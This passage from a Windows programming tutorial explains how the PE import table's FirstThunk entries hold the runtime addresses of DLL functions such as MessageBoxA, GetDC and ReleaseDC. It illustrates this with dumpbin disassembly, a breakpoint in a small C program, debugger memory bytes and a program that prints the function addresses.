The FirstThunk member for user32.dll has a value of 4090, again an rva. The variable pFirstThunk, which is a pointer to a long, is set to this FirstThunk value after it is converted to an actual memory location. We display the variable for each function called from the dll and also increment its value. The contents of this memory are also displayed.

 

The imports data gives a listing of only the functions called from each dll. When we install Visual C++ we get a program called dumpbin that displays the internals of a PE file.

 

Run dumpbin on d.exe as dumpbin /DISASM d.exe. The DISASM option disassembles the code in our exe file.

 

  00401000: 55                 push        ebp

  00401001: 8B EC              mov         ebp,esp

  00401003: 6A 00              push        0

  00401005: 68 30 50 40 00     push        405030h

  0040100A: 68 34 50 40 00     push        405034h

  0040100F: 6A 00              push        0

  00401011: FF 15 94 40 40 00  call        dword ptr ds:[00404094h]

  00401017: 6A 00              push        0

  00401019: 68 38 50 40 00     push        405038h

  0040101E: 68 40 50 40 00     push        405040h

  00401023: 6A 00              push        0

  00401025: FF 15 94 40 40 00  call        dword ptr ds:[00404094h]

  0040102B: 6A 00              push        0

  0040102D: FF 15 98 40 40 00  call        dword ptr ds:[00404098h]

  00401033: 6A 00              push        0

  00401035: 6A 00              push        0

  00401037: FF 15 90 40 40 00  call        dword ptr ds:[00404090h]

  0040103D: 5D                 pop         ebp

  0040103E: C3                 ret

 

The first two calls are to the MessageBoxA function. The compiler/linker combo however knows nothing about the address of the function MessageBoxA. All that the library user32.lib has is the function's name and its ordinal number.

 

The address of the function in the dll is not stored in the lib file. Even though the dll user32 is present on our machine and the exports section will contain the address of the function MessageBoxA, the linker does not bring in this address at all. Do remember that the dll need not be present on the machine the program is being linked on, the lib file suffices.

 

The function's address in the dll is an rva from where the dll is loaded in memory. Thus to get at the real address, it is important to know the location of the dll in memory. Though this information can be extracted by the linker, it is not, for the simple reason that the exe file may be built on one machine and executed on another.

 

If that is the case, user32.dll may be loaded somewhere else in memory and thus the absolute addresses of the functions change, even though the rvas may be the same. Different versions of the dll may also store the function at a different place. The placement of a dll in memory is decided by the operating system and its service pack. Thus it is the job of the runtime loader to figure out the address of the function in memory.

 

Thus the absolute addresses of the functions can never be determined at link time. The second hurdle is that one function, such as printf or MessageBox, can be called many times in a program. One cannot expect the loader to read the program code at runtime and replace every call to, say, MessageBoxA with the address of the function in memory on that machine. This would simply take too long.

 

When a program is executed, the system first does the normal sanity checks. In the disassembled code, the call to the MessageBoxA function is an indirect call: the processor goes to memory location 404094 and calls the function whose address is stored at that location.

 

When the import table is displayed, the FirstThunk member points to 404090; since MessageBoxA is the second function, its slot is at 404094. Thus, to simplify matters, all that the loader does at runtime is read the import section.

 

The Characteristics member gives it the function name and ordinal number, and the FirstThunk member gives it the corresponding memory location, which is meant to hold the address of that function. Thus the loader figures out the address of MessageBoxA on that machine and places it at memory location 404094.

 

Thus it needs to do this only once, irrespective of the number of times the function is called. In the same vein, memory location 404090 stores the address of the function ReleaseDC and 404098 that of GetDC.

 

To confirm this we add a breakpoint interrupt in file d.c as follows.

 

d.c

#include <windows.h>

main()

{

/* breakpoint interrupt, written as Visual C++ x86 inline assembly */

__asm int 3

MessageBox(0,"hi","bye",0);

MessageBox(0,"hi1","bye1",0);

GetDC(0);

ReleaseDC(0,0);

}

 

Running the above program drops us into the debugger. In the memory window, we enter the memory location 00404090. The bytes shown are as follows.

 

Memory

00404090  7A 3A E1 77

00404094  D5 75 E3 77

00404098  6C 3A E1 77

 

Now run the program f.c, which contains the following.

 

f.c

#include <windows.h>

#include <stdio.h>

main()

{

printf("ReleaseDC=%x\n",ReleaseDC);

printf("MessageBox=%x\n",MessageBox);

printf("GetDC=%x\n",GetDC);

}

 

ReleaseDC=77e13a7a

MessageBox=77e375d5

GetDC=77e13a6c

 

This program discloses the address of the ReleaseDC function as 77e13a7a. At memory location 404090, the same value is stored, but with the bytes in reverse order, since the x86 processor stores multi-byte values least significant byte first. The import table also shows ReleaseDC as its first member, and the disassembly reaches it through this same location. In the same vein, the address of the MessageBoxA function is 77e375d5, which is the value found at location 404094. Ditto for GetDC at 404098.

 
